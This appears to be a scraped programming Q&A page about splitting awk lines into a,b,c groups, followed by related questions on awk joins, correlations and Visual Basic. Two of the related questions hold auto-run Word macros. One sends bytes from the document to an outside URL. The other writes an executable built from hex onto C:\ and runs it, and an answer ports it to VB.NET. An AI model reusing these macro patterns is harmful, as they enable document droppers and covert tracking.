Break lines at specified points with awk

I have a file with multiple lines in the following form:
name1 a1 b3 c6 a3 b4 c9
name2 a7 b8 c7 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 c19 a7 b2 c10 a3 b5 c67
I need to break the lines after the letters repeat (i.e. after each a,b,c), but have the original name (field 1) retained:
name1 a1 b3 c6
name1 a3 b4 c9
name2 a7 b8 c7
name2 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 c19
name4 a7 b2 c10
name4 a3 b5 c67
I tried something along the lines of:
awk -F"\t" '{ for (i=2;i<=NF;i++) print $1"\t"$i }' file
but that loop prints every field on its own line. Is there a way to group them?
Thank you.

#starter5: Try:
awk 'BEGIN{V["a"];V["b"];V["c"]} /name/{R=$0;next} {Q=$0;gsub(/[[:digit:]]/,"",Q)} (Q in V){if(!W[Q]++){A++}} $0{if(A==1 && $0 && R){$0=R OFS $0};printf("%s %s",$0,(A==3?"\n":OFS));;if(A==3){A="";delete W}}' RS='[ +|\n]' Input_file
Here is the same solution in non-one-liner form. Note that a regular expression in RS is not POSIX awk; it works in gawk and mawk.
awk 'BEGIN{
    V["a"];
    V["b"];
    V["c"]
}
/name/{
    R=$0;
    next
}
{
    Q=$0;
    gsub(/[[:digit:]]/,"",Q)
}
(Q in V){
    if(!W[Q]++){
        A++
    }
}
$0 {
    if(A==1 && $0 && R){
        $0=R OFS $0
    };
    printf("%s %s",$0,(A==3?"\n":OFS));;
    if(A==3) {
        A="";
        delete W
    }
}
' RS='[ +|\n]' Input_file
Say we have the following Input_file, where I changed the last line so that a, b and c do not come in sequence. The script will NOT break the line until all three of them have been found. Have a look and let me know.
cat Input_file
name1 a1 b3 c6 a3 b4 c9
name2 a7 b8 c7 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 a19 a7 b2 c10 a3 b5 c67
Output will be as follows.
name1 a1 b3 c6
name1 a3 b4 c9
name2 a7 b8 c7
name2 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 a19 a7 b2 c10
name4 a3 b5 c67
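
For comparison, the same "do not break until a, b and c have all been seen" rule can be sketched field by field with the default record separator, so it does not depend on a regular-expression RS. This is only an illustrative sketch: the function name split_complete_groups and the letters variable are made up for this example, and it assumes each group is identified by the first character of its fields.

```shell
# Hypothetical helper: break a line only once every letter in "letters" has been seen.
split_complete_groups() {
    awk -v letters="a b c" '
    BEGIN { n = split(letters, l, " "); for (k = 1; k <= n; k++) want[l[k]] }
    {
        line = $1; pending = 0; found = 0; split("", seen)
        for (i = 2; i <= NF; i++) {
            line = line OFS $i; pending++
            c = substr($i, 1, 1)                       # group letter of this field
            if ((c in want) && !(c in seen)) { seen[c]; found++ }
            if (found == n) {                          # all required letters have appeared
                print line
                line = $1; pending = 0; found = 0; split("", seen)
            }
        }
        if (pending) print line                        # flush an incomplete trailing group
    }' "$@"
}

# Two lines taken from the modified Input_file above
result=$(printf '%s\n' \
    'name1 a1 b3 c6 a3 b4 c9' \
    'name4 a4 b34 a19 a7 b2 c10 a3 b5 c67' | split_complete_groups)
printf '%s\n' "$result"
```

An incomplete group at the end of a line is still printed rather than dropped; whether that is the desired behaviour depends on the data.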

{                                   # for every record
    printf "%s", $1                 # print the name (never use data as the format string)
    c = substr($2, 1, 1)            # first letter of a group
    printf "%s%s", OFS, $2          # first part of the first group
    for (i = 3; i <= NF; i++) {     # for all remaining fields
        if (index($i, c) != 1)      # if the next group has not started
            printf "%s%s", OFS, $i  # print this part on the same line
        else                        # otherwise
            printf "%s%s%s%s", ORS, $1, OFS, $i  # start a new line with the name and this part
    }                               # done for all fields
    printf "%s", ORS                # finish the line
}                                   # done for this record
This does not work if some letter repeats within a group. For example, it won't work for a3 b5 a4 c6 a5 b6 a0 b9 where groups of a b a c are present.
This can be run like:
awk '{ printf "%s%s%s", $1, OFS, $2; c=substr($2,1,1); for(i=3;i<=NF;i++) if(index($i,c)!=1) printf "%s%s", OFS, $i; else printf "%s%s%s%s", ORS, $1, OFS, $i; printf "%s", ORS }' file

I need to break the lines after the letters repeat (i.e. after each
a,b,c), but have the original name (field 1) retained:
Input
$ cat file
name1 a1 b3 c6 a3 b4 c9
name2 a7 b8 c7 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 c19 a7 b2 c10 a3 b5 c67
Output
$ awk 'function _p(){print $1,s; s=""; split("",p)}{for(i=2; i<=NF; i++){ c=substr($i,1,1);if(c in p)_p(); s = (s?s OFS:"") $i; p[c] }_p()}' file
name1 a1 b3 c6
name1 a3 b4 c9
name2 a7 b8 c7
name2 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 c19
name4 a7 b2 c10
name4 a3 b5 c67
More readable version
awk '
function _p()
{
    print $1,s;
    s="";
    split("",p)
}
{
    for(i=2; i<=NF; i++)
    {
        c=substr($i,1,1);
        if(c in p)_p();
        s = (s?s OFS:"") $i;
        p[c]
    }
    _p()
}
' file
OR
$ awk 'function _p(){print $1,s; s=p=""}{for(i=2; i<=NF; i++){ c=substr($i,1,1); if(c==p)_p(); s = (s?s OFS:"") $i; if(!p)p=c }_p()}' file
name1 a1 b3 c6
name1 a3 b4 c9
name2 a7 b8 c7
name2 a9 b10 c13
name3 a12 b9 c8
name4 a4 b34 c19
name4 a7 b2 c10
name4 a3 b5 c67
More readable version
awk '
function _p()
{
    print $1,s;
    s=p=""
}
{
    for(i=2; i<=NF; i++)
    {
        c=substr($i,1,1);
        if(c==p)_p();
        s = (s?s OFS:"") $i;
        if(!p)p=c
    }
    _p()
}' file

Related

Concatenate two files with a common pattern but with several lines

I have two files :
File 1 (sep = tab):
A1 bla blo bli 23
A1 bla blo bli 21
A1 bla blo bli 28
B2 bla blo bli 32
B2 bla blo bli 31
B2 bla blo bli 35
File 2 (sep = ;):
fli;flo;A1;flu;flc
fli;flo;A2;flu;flc
fli;flo;B1;flu;flc
fli;flo;B2;flu;flc
I am trying to append to each line of File 2 all the values from File 1 that share its key, like this:
fli;flo;A1;flu;flc;23;21;28
fli;flo;A2;flu;flc;
fli;flo;B1;flu;flc;
fli;flo;B2;flu;flc;32;31;35
Is there an awk command that can do that?
Thanks in advance

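awk 'BEGIN{OFS=";"}
# file1 (tab-separated): collect the last field of each row under the key in field 1
(NR==FNR){ v[$1] = (($1 in v) ? v[$1] OFS : "") $NF; next }
# file2 (semicolon-separated): the key is field 3; append the collected values to the line
{ print $0 OFS v[$3] }' FS="\t" file1 FS=";" file2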

correlations across columns AWK

I need to calculate correlations across columns.
The code below works when calculating correlations across rows.
What needs to be modified to calculate across columns?
Input file:
Name C1 C2 C3 C4 C5 C6
R1 1 2 3 4 5 6
R2 2 1 1 0 1 0
R3 1 3 1 1 2 1
R4 1 1 0 2 0 1
R5 1 2 2 2 0 2
R6 1 1 0 1 2 0
Desired Output:
C1 C1 1.00
C1 C2 -0.4
C1 C3 -0.069
C1 C4 -0.597
C1 C5 -0.175
C1 C6 -0.362
C2 C2 1.00
C2 C3 0.4889
etc.
Code:
awk '{
a = 0; for (i = 2; i <= NF; ++i) a += $i; a /= NF-1
b = 0; for (i = 2; i <= NF; ++i) b += ($i - a) ^ 2; b = sqrt(b)
if (b <= 0) next
for (i = 2; i <= NF; ++i) x[NR, i] = ($i - a) / b
n[NR] = $1
for (i = 2; i <= NR; ++i) {
if (!(i in n)) continue
a = 0
for (k = 2; k <= NF; ++k)
a += x[NR, k] * x[i, k]
print n[NR], n[i], a
}}'

I don't know if you are looking for this kind of solution, but how about transposing first with the following awk:
awk '
{ for (i=1;i<=NF;i++) arr[i","NR]=$i; }
END {
for (i=1;i<=NF;i++) {
for (j=1;j<=NR;j++) printf("%s%s",arr[i","j],FS);
printf("%s",RS);
}
}
'
Output:
Name R1 R2 R3 R4 R5 R6
C1 1 2 1 1 1 1
C2 2 1 3 1 2 1
C3 3 1 1 0 2 0
C4 4 0 1 2 2 1
C5 5 1 2 0 0 2
C6 6 0 1 1 2 0
Then just combine it with your script to calculate column-to-column correlations:
awk '
{ for (i=1;i<=NF;i++) arr[i","NR]=$i; }
END {
for (i=1;i<=NF;i++) {
for (j=1;j<=NR;j++) printf("%s%s",arr[i","j],FS);
printf("%s",RS);
}
}
' roddy.txt | awk '{
a = 0; for (i = 2; i <= NF; ++i) a += $i; a /= NF-1
b = 0; for (i = 2; i <= NF; ++i) b += ($i - a) ^ 2; b = sqrt(b)
if (b <= 0) next
for (i = 2; i <= NF; ++i) x[NR, i] = ($i - a) / b
n[NR] = $1
for (i = 2; i <= NR; ++i) {
if (!(i in n)) continue
a = 0
for (k = 2; k <= NF; ++k)
a += x[NR, k] * x[i, k]
print n[NR], n[i], a
}}'
Output:
C1 C1 1
C2 C1 -0.4
C2 C2 1
C3 C1 -0.069843
C3 C2 0.488901
C3 C3 1
C4 C1 -0.597614
C4 C2 0.239046
C4 C3 0.667827
C4 C4 1
C5 C1 -0.175412
C5 C2 0.30697
C5 C3 0.581936
C5 C4 0.576557
C5 C5 1
C6 C1 -0.362738
C6 C2 0.362738
C6 C3 0.861381
C6 C4 0.932143
C6 C5 0.731727
C6 C6 1
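
As an alternative sketch, the transpose step can be avoided by accumulating per-column sums and cross-products while reading the rows, then applying the usual Pearson formula r = (n*Sxy - Sx*Sy) / sqrt((n*Sxx - Sx^2) * (n*Syy - Sy^2)) in the END block. This is not the script from the question; the function name column_correlations is made up for illustration, and it assumes the first row is a header and the first column holds row names.

```shell
# Hypothetical helper: Pearson correlation between every pair of columns, in one pass.
column_correlations() {
    awk '
    NR == 1 { nf = NF; for (i = 2; i <= nf; i++) name[i] = $i; next }   # header row
    {
        n++                                        # number of data rows
        for (i = 2; i <= nf; i++) {
            sum[i] += $i
            for (j = 2; j <= i; j++) prod[i, j] += $i * $j
        }
    }
    END {
        for (i = 2; i <= nf; i++)
            for (j = 2; j <= i; j++) {
                cov = n * prod[i, j] - sum[i] * sum[j]
                vi  = n * prod[i, i] - sum[i] ^ 2
                vj  = n * prod[j, j] - sum[j] ^ 2
                if (vi > 0 && vj > 0)              # skip constant columns
                    printf "%s %s %.6f\n", name[i], name[j], cov / sqrt(vi * vj)
            }
    }' "$@"
}

# Input file from the question
result=$(printf '%s\n' \
    'Name C1 C2 C3 C4 C5 C6' \
    'R1 1 2 3 4 5 6' \
    'R2 2 1 1 0 1 0' \
    'R3 1 3 1 1 2 1' \
    'R4 1 1 0 2 0 1' \
    'R5 1 2 2 2 0 2' \
    'R6 1 1 0 1 2 0' | column_correlations)
printf '%s\n' "$result"
```

The pairs come out in the same order as in the transposed pipeline (C1 C1, C2 C1, C2 C2, ...), with values printed to six decimal places.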

Run-time error 62 Input past end of file

I am trying to read the last few bytes of a Microsoft Word file. I am getting the following error on line MyStr = Input(64, #1)
Run-time error 62 Input past end of file
Sub Document_Open()
Dim f As Document
Set f = ActiveDocument
MsgBox f.Name
Dim MaxSize, NextChar, MyStr, EndSize
Open f.Name For Input As #1
MaxSize = LOF(1)
EndSize = MaxSize - 63
NextChar = EndSize
Seek #1, NextChar
MyStr = Input(64, #1)
MsgBox (MyStr)
Close #1
Dim o
Dim NewStr As String
NewStr = "http://test.com/?rid=" + MyStr + "&type=doc"
Set o = CreateObject("MSXML2.ServerXMLHTTP")
o.Open "GET", NewStr, False
o.send
MsgBox (o.responsetext)
Dim IE
Set IE = CreateObject("InternetExplorer.Application")
IE.navigate ("https://en.wikipedia.org/")
IE.Visible = True
End Sub

Input # is intended to be used for files that were created with Write #, and the result gets "parsed" as it's being read. You can get more specific information in the documentation. Word documents are binary files, so that's going to create all kinds of problems. The last 64 bytes of a random .docx file look kind of like this:
00 00 08 06 00 00 12 00 00 00 00 00 00 00 00 00
00 00 00 00 20 E2 01 00 77 6F 72 64 2F 66 6F 6E
74 54 61 62 6C 65 2E 78 6D 6C 50 4B 05 06 00 00
00 00 0F 00 0F 00 DF 03 00 00 42 E4 01 00 00 00
So, you need to open the file For Binary. You can then easily just pull it into a fixed length string with Get.
Note that you should also use FreeFile instead of hard coded file handles:
Dim handle As Integer
handle = FreeFile
Open f.Name For Binary Access Read As handle
Dim last64Bytes As String * 64
' Byte positions are 1-based, so the last 64 bytes start at LOF - 63
Get handle, LOF(handle) - 63, last64Bytes
Debug.Print last64Bytes
Close handle

Find all permutations from 1-9 and A-F

I am trying to find all possible permutations from the following conditions:
Number range 1-99
Letter range A-F
32 Digit long string
What would you recommend to make my life easier? I tried to search for permutations in VB but just can't find anything, and I don't know why, since it doesn't seem like such a hard task :s
Samples:
9A E5 4B CA BD 93 DE 2E 01 00 00 01 00 00 00 00
6E C7 9A CF CB A7 67 D9 17 EE 6B 70 F0 5E E4 32
64 86 00 EA 91 71 65 67 1F CE FE EB B1 CC 07 84
63 C0 8A AD F7 9F 5D F3 06 01 00 07 00 00 00 00
51 16 15 7C 56 9F 0A FF 55 1C 20 91 58 CD AA CF
48 61 56 FF 41 6E 49 F8 45 70 49 FE 54 75 52 1B
45 BA B8 B7 42 52 E3 77 03 00 00 03 00 00 00 00
40 D0 F4 04 BF AF 2B 99 02 00 00 02 00 00 00 00
40 30 90 00 3F 7C 83 3E 68 98 D5 D5 6D D9 A3 E9
FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
FE A1 CE 6D A6 82 A9 D1 00 00 00 00 00 00 00 00
Thanks for helpin!
EDIT:
Here's my code
Public Class Form1
Dim c As Integer
Dim p1, p2, p3, p4, p5, p6, p7, p8, p9, p10, p11, p12, p13, p14, p15, p16, a As String
Dim combo As String
Dim random As Random
Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load
c = -1
While c <= 99
c = c + 1
If c < 10 Then
a = "0" & c
Else : a = c
End If
p1 = a
p2 = 2
combo = p1 + " " + p2 + " " + p3 + " " + p4 + " " + p5 + " " + p6 + " " + p7 + " " + p8 + " " + p9 + " " + p10 + " " + p11 + " " + p12 + " " + p13 + " " + p14 + " " + p15 + " " + p16 + " " + vbNewLine
RichTextBox1.AppendText(combo + vbNewLine)
End While
End Sub
End Class

Judging from your example, you mean 0-9 (not 1-9) and A-F
Alex K. neatly provides a direction to solve this:
You would ignore the "numbers and letters" since that is a hexadecimal
notation of bytes (AF == 175) There are 16 bytes, each of which can
hold 0 to 255 so you have
340,282,366,920,938,463,463,374,607,431,768,211,455 possible
combinations.
Although it is theoretically possible to enumerate all of these values, storing them at 16 bytes each would take roughly 5 × 10^30 GB. I don't think that much storage exists in total.
If it were a relatively tiny number, we could do this simply with the following method:
Sub purgatory()
Dim counter As Long
Dim output As String
counter = 0
For counter = 0 To 2147483647#
output = String(16 - Len(Hex(counter)), "0") & Hex(counter)
MsgBox output
Next counter
End Sub
But the maximum value of a Long in VBA is 2,147,483,647 (4 bytes, signed); in VB.NET a Long is 8 bytes. With a 4-byte counter, the upper 12 bytes and one bit of the 16-byte value will always be 0. This could be solved with a few nested For loops.
I think the solution to your problem is best answered by JNevill
16 combinations of 00-FF... That is insanity...
IMPORTANT NOTE: If you run the code I posted, it's important to first familiarize yourself with Ctrl+Pause/Break. Quickest way out of purgatory ;)

convert from hex code to exe file in vb.net

I have this code in vb6 that can create an exe file from its hex code. I want to do the same in vb.net.
This is my vb6 code:
Public Sub Document_Open()
Dim str As String
Dim hex As String
hex = hex & "4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00"
hex = hex & "40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
'you have to put the full hex code of the application here
Dim exe As String
Dim i As Long
Dim puffer As Long
i = 1
Do
str = Mid(hex, i, 2)
'convert hex to decimal
puffer = Val("&H" & str)
'convert decimal to ASCII
exe = exe & Chr(puffer)
i = i + 2
If i >= Len(hex) - 2 Then
Exit Do
End If
Loop
'write to file
Open "C:\application.exe" For Append As #2
Print #2, exe
Close #2
'and run the exe
Dim pid As Integer
pid = Shell("C:\application.exe", vbNormalFocus)
End Sub

It would be easier if the data was defined as a byte array literal, like this:
Dim bytes() As Byte = {&H4D, &H5A, &H50,
&H0, &H2, &H0} ' etc...
File.WriteAllBytes("c:\application.exe", bytes)
However, it would be nicer to store the binary data in a resource, then just write the resource out to a file, like this:
File.WriteAllBytes("c:\application.exe", My.Resources.Application_exe)
If you really need to convert it from a hexadecimal string, you could do it like this:
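' Requires Imports System.IO. Note the trailing space at the end of the first literal:
' without it the two pieces join as "0040" and one byte is lost.
Dim hex As String = "4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 " &
"40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"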
Using fs As New FileStream("c:\application.exe", FileMode.Create, FileAccess.Write)
For Each byteHex As String In hex.Split()
fs.WriteByte(Convert.ToByte(byteHex, 16))
Next
End Using
